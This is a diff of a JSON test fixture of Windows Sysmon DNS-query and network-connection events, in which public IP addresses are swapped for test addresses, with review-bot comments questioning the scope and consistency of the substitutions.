Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 usermatch.targeting.unrulymedia.com;::ffff:35.167.55.0;::ffff:52.24.219.168;::ffff:52.43.21.209;::ffff:54.200.225.167;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692750200Z'/\u003e\u003cEventRecordID\u003e137\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.137\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epre-usermatch.targeting.unrulymedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 usermatch.targeting.unrulymedia.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { 
@@ -4289,7 +4289,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692762900Z'/\u003e\u003cEventRecordID\u003e138\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.141\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003efarm.plista.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 farm-hetzner.plista.com;::ffff:144.76.67.119;::ffff:148.251.77.207;::ffff:148.251.15.115;::ffff:176.9.103.51;::ffff:88.198.208.110;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692762900Z'/\u003e\u003cEventRecordID\u003e138\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.141\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003efarm.plista.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 farm-hetzner.plista.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -4309,7 +4309,7 @@
 "event_data": {
 "QueryName": "farm.plista.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 farm-hetzner.plista.com;::ffff:144.76.67.119;::ffff:148.251.77.207;::ffff:148.251.15.115;::ffff:176.9.103.51;::ffff:88.198.208.110;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;",
+ "QueryResults": "type: 5 farm-hetzner.plista.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:04.141",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -4331,7 +4331,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692780500Z'/\u003e\u003cEventRecordID\u003e139\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.168\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ebeacon.krxd.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:50.17.180.35;::ffff:50.19.103.40;::ffff:50.19.210.19;::ffff:50.19.117.149;::ffff:50.19.222.244;::ffff:50.19.222.88;::ffff:50.19.81.100;::ffff:54.204.10.30;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692780500Z'/\u003e\u003cEventRecordID\u003e139\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.168\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ebeacon.krxd.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -4358,7 +4358,7 @@
 },
 "event_data": {
 "QueryStatus": "0",
- "QueryResults": "type: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:50.17.180.35;::ffff:50.19.103.40;::ffff:50.19.210.19;::ffff:50.19.117.149;::ffff:50.19.222.244;::ffff:50.19.222.88;::ffff:50.19.81.100;::ffff:54.204.10.30;192.5.6.30;",
+ "QueryResults": "type: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:04.168",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -4384,7 +4384,7 @@
 "ProcessId": "4",
 "Protocol": "udp",
 "SourceHostname": "vagrant-2012-r2.local.crowbird.com",
- "DestinationIp": "169.254.180.25",
+ "DestinationIp": "89.160.20.156",
 "DestinationIsIpv6": "false",
 "Image": "System",
 "User": "NT AUTHORITY\\SYSTEM",
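Review bot: The `DestinationIp` changed in the @@ -4384 hunk was `169.254.180.25`, a link-local address rather than a public one, so it does not fall under the commit's stated scope and the replacement changes what the event describes: a NetBIOS name-service datagram (udp, port 137 per the surrounding `SourcePortName`/`DestinationPortName` fields) now appears to go to a routable host instead of the local segment. The same substitution is made inside `event.original` in the hunk at @@ -4414. If the intent is only to avoid unsupported public addresses, the link-local value can stay; if it is to exercise GeoIP enrichment on this event, any expected output derived from it (geo, direction or network-type fields, if the pipeline sets them) has to be regenerated to match, which is not visible in this diff.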
@@ -4414,7 +4414,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e23\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.218\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e23\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.218\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData 
Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3" } }, 
@@ -4755,7 +4755,7 @@ { "@timestamp": "2021-05-05T15:30:51.704Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692791400Z'/\u003e\u003cEventRecordID\u003e140\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692791400Z'/\u003e\u003cEventRecordID\u003e140\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -4772,7 +4772,7 @@ "time_created": "2019-07-18T03:34:04.692Z", "level": "information", "event_data": { - "QueryResults": "type: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;", + "QueryResults": "type: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.169", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -4810,7 +4810,7 @@
 "ProcessId": "2736",
 "QueryName": "sync.mathtag.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 pixel-origin.mathtag.com;::ffff:216.200.232.235;::ffff:216.200.232.201;::ffff:74.121.138.26;::ffff:216.200.232.185;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;"
+ "QueryResults": "type: 5 pixel-origin.mathtag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;"
 },
 "record_id": 141,
 "event_id": "22",
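Review bot: The substitution in this hunk is applied to IPv4 answers only: `192.5.6.30`, `192.33.14.30`, `192.26.92.30` and `192.31.80.30` become RFC 1918 `192.168.x.30` addresses, while their IPv6 neighbours `2001:503:a83e::2:30`, `2001:503:231d::2:30` and `2001:503:83eb::30` (which look like the gTLD server glue) stay as real public addresses on the new side; the same pattern appears in the hunks at @@ -4830, @@ -4892, @@ -4915, @@ -4940, @@ -4956, @@ -5029 and @@ -5040. If the goal is a fixture that only references addresses the test GeoIP data supports, the public IPv6 entries need the same treatment, or the changelog entry should say that only IPv4 is in scope, otherwise the expected output still depends on addresses outside the supported subset. Replacing the IPv4 glue with private addresses while the IPv6 siblings remain public also yields an answer set no resolver would produce, which is acceptable for a fixture only if it is deliberate.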
@@ -4830,7 +4830,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692803100Z'/\u003e\u003cEventRecordID\u003e141\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.mathtag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-origin.mathtag.com;::ffff:216.200.232.235;::ffff:216.200.232.201;::ffff:74.121.138.26;::ffff:216.200.232.185;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692803100Z'/\u003e\u003cEventRecordID\u003e141\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.mathtag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-origin.mathtag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -4851,7 +4851,7 @@
 "ProcessId": "2736",
 "QueryName": "status.rapidssl.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;",
+ "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:04.184",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}"
@@ -4875,7 +4875,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692814000Z'/\u003e\u003cEventRecordID\u003e142\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' 